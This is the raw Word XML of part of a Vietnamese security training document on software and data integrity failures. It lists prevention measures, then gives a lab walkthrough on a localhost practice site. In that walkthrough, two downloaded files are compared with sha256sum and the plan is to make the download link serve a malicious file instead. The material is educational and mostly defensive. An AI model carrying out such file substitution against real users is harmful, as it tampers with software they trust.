    <w:p w14:paraId="26253F38" w14:textId="725DB00A" w:rsidR="00151DDF" w:rsidRPr="00620A59" w:rsidRDefault="00620A59" w:rsidP="00620A59">
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00620A59">
        <w:t>Điều này có thể xảy ra khi sử dụng phần mềm từ các nguồn và kho l</w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00620A59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00620A59">
        <w:t>u trữ không đáng tin cậy hoặc thậm chí là phần mềm bị can thiệp tại nguồn, trong quá trình chuyển tiếp hoặc thậm chí là trong bộ đệm của endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDF8968" w14:textId="792B1ADE" w:rsidR="00B80D4C" w:rsidRDefault="00B80D4C" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc182909863"/>
      <w:r>
        <w:t>Biện pháp ngăn chặn</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="2726864D" w14:textId="22CBD7F3" w:rsidR="00B80D4C" w:rsidRPr="00620A59" w:rsidRDefault="00B80D4C" w:rsidP="00620A59">
      <w:r w:rsidRPr="00620A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Sử dụng phần mềm được ký kỹ thuật số bởi nhà cung cấp đáng tin cậy.</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Ví dụ: </w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t>Khi tải về phần mềm từ một nguồn, hãy kiểm tra xem nó có được ký bởi một nhà phát hành đáng tin cậy như Microsoft, Apple hay Google không.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3469897A" w14:textId="31B86861" w:rsidR="00B80D4C" w:rsidRPr="00620A59" w:rsidRDefault="00B80D4C" w:rsidP="00620A59">
      <w:r w:rsidRPr="00620A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Sử dụng các kho phần mềm đáng tin cậy.</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> Đảm bảo rằng các plugin </w:t>
      </w:r>
      <w:r w:rsidR="00620A59" w:rsidRPr="00620A59">
        <w:t xml:space="preserve">được </w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t>cài đặt từ kho lưu trữ chính thức của WordPress thay vì từ các trang web không rõ nguồn gốc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A9E182" w14:textId="23C67386" w:rsidR="00B80D4C" w:rsidRPr="00620A59" w:rsidRDefault="00B80D4C" w:rsidP="00620A59">
      <w:r w:rsidRPr="00620A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Xác minh rằng các tiện ích mở rộng không chứa các lỗ hổng đã biết.</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> Trước </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB5E78">
        <w:t>khi cài đặt plugin, hãy kiểm tra xem có lỗ hổng nào đã được công bố trên các trang như CVE hay không.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EA6551" w14:textId="0203BCC1" w:rsidR="00B80D4C" w:rsidRPr="00620A59" w:rsidRDefault="00B80D4C" w:rsidP="00620A59">
      <w:r w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Xác minh checksum và hash của tệp tin.</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> Sau khi tải xuống phần mềm, so sánh checksum của tệp với checksum được cung cấp bởi nhà phát hành để đảm bảo rằng tệp không bị thay đổi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27168413" w14:textId="523713CB" w:rsidR="00B80D4C" w:rsidRPr="00620A59" w:rsidRDefault="00DA0487" w:rsidP="00620A59">
      <w:r w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00B80D4C" w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Đảm bảo có quy trình xem xét các thay đổi/cập nhật mã nguồn.</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B80D4C" w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidR="00B80D4C" w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> Trước khi đẩy một bản cập nhật lên hệ thống sản xuất, hãy thực hiện kiểm tra mã nguồn hoặc chạy kiểm thử tự động để tìm kiếm các thay đổi bất thường.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E87FA52" w14:textId="3E79B541" w:rsidR="00B80D4C" w:rsidRPr="00620A59" w:rsidRDefault="00DA0487" w:rsidP="00620A59">
      <w:r w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00B80D4C" w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Đảm bảo kiểm soát truy cập đúng cách để duy trì tính toàn vẹn dữ liệu.</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B80D4C" w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidR="00B80D4C" w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B80D4C" w:rsidRPr="00FB5E78">
        <w:t>Thiết lập quyền truy cập phù hợp cho các tệp cấu hình quan trọng để chỉ những người được phép mới có thể sửa đổi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF6FFB0" w14:textId="77777777" w:rsidR="00151DDF" w:rsidRPr="00151DDF" w:rsidRDefault="00151DDF" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc182909864"/>
      <w:r w:rsidRPr="00151DDF">
        <w:lastRenderedPageBreak/>
        <w:t>Kịch bản tấn công thực hành</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="285A6D7B" w14:textId="67B3E3FA" w:rsidR="00031203" w:rsidRDefault="00031203" w:rsidP="00031203">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc182909865"/>
      <w:r w:rsidRPr="00031203">
        <w:t>Bài thực hành – Lab 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="0D440484" w14:textId="5CB449DE" w:rsidR="004E0865" w:rsidRPr="004E0865" w:rsidRDefault="004E0865" w:rsidP="004E0865">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E0865">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Truy cập vào: </w:t>
      </w:r>
      <w:hyperlink r:id="rId89" w:history="1">
        <w:r w:rsidRPr="004E0865">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://localhost:8000/2021/A8/lab2</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="39F13EEB" w14:textId="6D047300" w:rsidR="0065424E" w:rsidRPr="009D0400" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tiêu đề: </w:t>
      </w:r>
      <w:r w:rsidRPr="001E61D6">
        <w:t>Software and Data Integrity Failures</w:t>
      </w:r>
      <w:r w:rsidR="004E0865">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7621A83D" w14:textId="5DB0F4C7" w:rsidR="0065424E" w:rsidRPr="009D0400" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001E61D6">
        <w:t>Trang web cho phép tải về các file, nhưng kẻ tấn công có thể can thiệp vào tính toàn vẹn của dữ liệu bằng cách thay đổi file tải về.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044026AC" w14:textId="77777777" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EB822F" w14:textId="3D49EA7F" w:rsidR="0065424E" w:rsidRDefault="00FB5E78" w:rsidP="0065424E">
      <w:r w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB5E78">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FB5E78">
        <w:t>ruy cập vào task và nhận thấy rằng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEE0B82" w14:textId="77777777" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r w:rsidRPr="00574F14">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01A49051" wp14:editId="214119B7">
            <wp:extent cx="6115050" cy="1210310"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="1478354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54484" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId90"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1210310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3C4A2D" w14:textId="2E2940A7" w:rsidR="0065424E" w:rsidRDefault="00FB5E78" w:rsidP="0065424E">
      <w:r w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidR="0065424E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="0065424E">
        <w:t>hử thực hiện nhập tên và tải file (nhấn vào link):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F672EB" w14:textId="77777777" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r w:rsidRPr="00574F14">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5984545A" wp14:editId="44A4E1FD">
            <wp:extent cx="6115050" cy="962025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1122876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76165" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId91"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="962025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA381A8" w14:textId="77777777" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00574F14">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="047E8E9D" wp14:editId="0631DF80">
            <wp:extent cx="5620534" cy="1476581"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="952752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52487" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId92"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5620534" cy="1476581"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB1CD2B" w14:textId="71C582DA" w:rsidR="0065424E" w:rsidRDefault="00FB5E78" w:rsidP="0065424E">
      <w:r w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r w:rsidR="0065424E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="0065424E">
        <w:t xml:space="preserve">iểm tra file1 vừa tải về, chính là </w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>real.txt</w:t>
      </w:r>
      <w:r w:rsidR="0065424E">
        <w:t xml:space="preserve">  có nội dung như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1918BADF" w14:textId="77777777" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r w:rsidRPr="00574F14">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4257E966" wp14:editId="41A1B4DD">
            <wp:extent cx="6115050" cy="1969135"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1514886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86324" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId93"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1969135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C5C517" w14:textId="199F8506" w:rsidR="0065424E" w:rsidRPr="005027A8" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r w:rsidRPr="005027A8">
        <w:t>Tiếp theo, yêu cầu</w:t>
      </w:r>
      <w:r w:rsidR="00FB5E78">
        <w:t xml:space="preserve"> đề bài</w:t>
      </w:r>
      <w:r w:rsidRPr="005027A8">
        <w:t xml:space="preserve"> cho </w:t>
      </w:r>
      <w:r w:rsidR="00FB5E78">
        <w:t xml:space="preserve">biết </w:t>
      </w:r>
      <w:r w:rsidRPr="005027A8">
        <w:t xml:space="preserve">một file </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>fake.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="005027A8">
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidR="00FB5E78" w:rsidRPr="00FB5E78">
        <w:t xml:space="preserve">tiến hành </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB5E78">
        <w:t>kiểm ra thử như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1226F985" w14:textId="77777777" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F66525">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73A44EB6" wp14:editId="016C8073">
            <wp:extent cx="6115050" cy="965200"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="2040333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33662" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId94"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="965200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00F66525">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A8877A5" wp14:editId="2062D3CE">
            <wp:extent cx="6115050" cy="963295"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1993427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27417" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId95"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="963295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3F27F3" w14:textId="77777777" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F66525">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A644322" wp14:editId="437012CB">
            <wp:extent cx="5258534" cy="1381318"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1199339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39418" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId96"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5258534" cy="1381318"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEC7DCE" w14:textId="4B68B39C" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Kiểm tra file</w:t>
      </w:r>
      <w:r w:rsidR="00FB5E78">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>fake.txt</w:t>
      </w:r>
      <w:r w:rsidR="00FB5E78">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>thấy nội dung như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A30A4D" w14:textId="77777777" w:rsidR="0065424E" w:rsidRPr="00F66525" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F66525">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D8DCC5D" wp14:editId="03E5E4BB">
            <wp:extent cx="6049219" cy="1629002"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="651926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26535" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId97"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6049219" cy="1629002"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCEE3DE" w14:textId="2FE0EF10" w:rsidR="0065424E" w:rsidRPr="00FB5E78" w:rsidRDefault="00FB5E78" w:rsidP="00FB5E78">
      <w:r w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 4:</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FB5E78">
        <w:t xml:space="preserve"> Kiểm tra tính toàn vẹn giữa 2 file này:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1508A8D2" w14:textId="1B5B9E5C" w:rsidR="0065424E" w:rsidRPr="00F66525" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F66525">
        <w:t xml:space="preserve">Bằng cách sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>sha256sum</w:t>
      </w:r>
      <w:r w:rsidRPr="00F66525">
        <w:t xml:space="preserve"> kiểm tra tính toàn vẹn của 2 file</w:t>
      </w:r>
      <w:r w:rsidR="00FB5E78">
        <w:t xml:space="preserve"> thì </w:t>
      </w:r>
      <w:r w:rsidRPr="00F66525">
        <w:t>thấy kết quả khác nhau</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08414CB8" w14:textId="77777777" w:rsidR="0065424E" w:rsidRPr="00F66525" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F66525">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25847E5A" wp14:editId="66F000CF">
            <wp:extent cx="6115050" cy="1124585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2109393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93108" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId98"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1124585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C28ECCF" w14:textId="17C843EC" w:rsidR="0065424E" w:rsidRPr="00F66525" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r w:rsidRPr="00F66525">
        <w:t xml:space="preserve">Ý tưởng </w:t>
      </w:r>
      <w:r w:rsidR="00FB5E78">
        <w:t xml:space="preserve">tiếp theo </w:t>
      </w:r>
      <w:r w:rsidRPr="00F66525">
        <w:t xml:space="preserve">là </w:t>
      </w:r>
      <w:r w:rsidR="00FB5E78">
        <w:t xml:space="preserve">thực hiện </w:t>
      </w:r>
      <w:r w:rsidRPr="00F66525">
        <w:t>khai thác kiểu tấn công này bằng cách</w:t>
      </w:r>
      <w:r w:rsidR="00FB5E78">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F66525">
        <w:t xml:space="preserve">khi mà nhấn vào link để tải file về, thay vì tải file </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>real.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00F66525">
        <w:t xml:space="preserve"> thì người dùng sẽ tải file </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>fake.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00F66525">
        <w:t xml:space="preserve"> (đây chính là file độc hại).</w:t>
      </w:r>
    </w:p>
